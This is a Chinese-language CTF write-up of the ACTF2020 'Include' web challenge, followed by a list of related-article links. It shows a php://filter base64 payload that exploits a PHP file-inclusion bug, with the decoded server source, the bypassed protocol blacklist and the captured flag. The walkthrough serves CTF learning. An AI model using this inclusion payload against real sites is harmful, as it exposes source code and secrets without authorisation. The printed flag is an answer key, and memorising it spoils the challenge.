[ACTF2020 新生賽]Include

一只本本發表於2024-11-11

發現flag.php就在這但是不回顯結果。
這時考慮使用偽協議間接讀取原始碼內容
以base64偽協議為例：
payload為：?file=php://filter/convert.base64-encode/resource=index.php

得到index.php的原始碼的base64編碼形式，

PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==

使用python指令碼解碼：

import base64

def base64_decode(base64_code):
      bytes = base64.b64decode(base64_code)
      ss = bytes.decode()
      print(ss)
  
a = 'PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg=='
base64_decode(a)

得到結果為php原始碼：

<meta charset="utf8">
  <?php
  error_reporting(0);
  $file = $_GET["file"];
  if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
  	exit('hacker!');
  }
  if($file){
  	include($file);
  }else{
  	echo '<a href="?file=flag.php">tips</a>';
  }
  ?>

發現有一些協議黑名單，但我們仍然可以使用base64偽協議訪問flag.php，得到PD9waHAKZWNobyAiQ2FuIHlvdSaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZTcyODA4ZjAtYjAyNC00YzhkLWEzZmQtNzI0MGVkZTVlOWY4fQo=
繼續base64解碼得到，這裡我們就拿到了flag

  <?php
  echo "Can you find out the flag?";
  //flag{e72808f0-b024-4c8d-a3fd-7240ede5e9f8}

[ACTF2020 新生賽]Exec
2024-10-31
TF2
[ACTF2020 新生賽]BackupFile
2024-11-20
TF2
[ACTF2020 新生賽]BackupFile 1
2024-03-13
TF2
[ACTF2020 新生賽]Upload
2024-09-16
TF2
新生賽10
2024-10-04
新生賽及預選賽 10
2024-10-06
NSSCTF2024新生賽
2024-10-27
TF2
[SWPUCTF 2021 新生賽]easyrce
2024-06-01
[SWPUCTF 2021 新生賽]finalrc
2024-07-01
[ACTF新生賽2020]rome
2024-10-26
bupt 2024 新生賽題解
2024-04-05
NSSCTF [SWPUCTF 2021 新生賽]hardrce
2024-08-15
Nssctf [SWPUCTF 2021 新生賽]error
2024-08-19
Error
Tron_CTF2024新生賽 MISC
2024-05-29
TF2
[SWPUCTF 2021 新生賽]easy_sql
2024-05-30
SQL
Tron_CTF2024新生賽 WEB
2024-05-30
TF2Web
ZZJC新生訓練賽第二場題解
2024-10-02
ZZJC新生訓練賽第九場題解
2024-10-25
ZZJC新生訓練賽第七場題解
2024-10-21
[SWPUCTF 2021 新生賽]gift_F12
2024-05-28
[SWPUCTF 2021 新生賽]easy_md5
2024-05-28
#include與#include區別
2016-07-11
Writeup-北郵新生賽MRCTF-Misc題：ezmisc
2020-10-16
NSSCTF [SWPUCTF 2021 新生賽]easyupload3.0
2024-08-15
include指令和include動作
2016-06-07
2014年北京師範大學新生程式設計競賽網路賽
2014-12-27
程式設計
【牛客訓練記錄】中國地質大學（武漢）2024年新生賽（同步賽）
2024-11-02
#include ＜＞ ““區別
2020-12-20
#include的作用
2024-03-14
湖南大學2020屆ACM新生賽部分題解
2021-01-03
ACM
【藍橋杯】“萌新首秀”全國高校新生程式設計排位賽3
2024-10-09
程式設計
include "head_file" 和 include <head_file>
2024-07-04
jsp中include指令和include動作的區別
2017-04-07
JS
php--include 、require
2017-06-21
PHPUI
phprequirevs.include
2014-05-09
PHPUI
BUUCTF-Include(Web)
2024-07-28
Web
include與require、require_once與include_once的區別
2021-03-21
UI
php中 include,require,include_once,require_once 的區別
2018-04-20
PHPUI

[ACTF2020 新生賽]Include

相關文章